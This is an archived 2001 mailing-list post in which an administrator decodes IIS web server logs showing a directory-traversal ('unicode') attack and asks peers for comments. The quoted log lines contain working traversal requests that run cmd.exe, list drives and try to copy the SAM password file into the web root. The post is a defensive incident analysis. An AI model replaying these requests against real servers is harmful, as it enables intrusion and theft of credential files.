Security Incidents mailing list archives
IIS Unicode attack decode
From: ROBERT DEMAIN <rdemain () RM COM>
Date: Tue, 20 Mar 2001 14:56:22 -0000
Hello All, Recently i've been seeing quite a few attempts from the same russian IP trying to send unicode commands to a web server. These attacks were picked up by an IDS. Below are extracts from the log file on the web server (see below) My understanding of what has happened here is as follows: -attacker tries a few attempts at doing a dir listing of c: and d: -attacker tries to copy important stuff from the \repair directory to c:\inetpub\wwwroot (most unfriendly) -attacker tries to copy bitmap (Blue%20Lace%2016.bmp) - not sure what this is about Putting it all together it seems the attacker tried to use the iis4 and 5 unicode exploit to copy the sam file to a place where he/she/it thought they could get it from (on this server c:\inetpub\wwwroot is not the default web site or anything, but i believe it is on a default iis install). This failed for two main reasons; 1. the iusr_servername account (which is the user account this exploit can run as - correct me if i'm wrong) does not have permissions on \repair 2. the copy of the file to c:\inetpub\wwwroot would also fail as iusr_servername would not have the rights. Anyone have any comments on this? Anyone else seen activity like this? Regards Rob 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD /Default.htm - 200 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /cgi-shl/win-c-sample.exe - 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible) 2001-03-19 22:23:14 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:23:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:23:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\SOMETHINGOTDOWITHME%20WEB%20HOSTING 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:25:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:25:15 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:25:42 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\repair\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:26:45 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:28:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:28:27 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:28:37 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:28:59 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:29:13 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\AdminScripts\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) 2001-03-19 22:29:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\wwwroot\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon) Standard Disclaimer: This message is confidential. You should not copy it or disclose its contents to anyone. You may use and apply the information only for the intended purpose. Internet communications are not secure and therefore RM does not accept legal responsibility for the contents of this message. Any views or opinions presented are only those of the author and not those of RM. If this email has come to you in error please delete it and any attachments. Please note that RM may intercept incoming and outgoing e-mail communications.
Current thread:
- IIS Unicode attack decode ROBERT DEMAIN (Mar 20)
- Re: IIS Unicode attack decode Derek Kwan (Mar 20)
- <Possible follow-ups>
- Re: IIS Unicode attack decode Portnoy, Gary (Mar 20)
- Re: IIS Unicode attack decode ROBERT DEMAIN (Mar 20)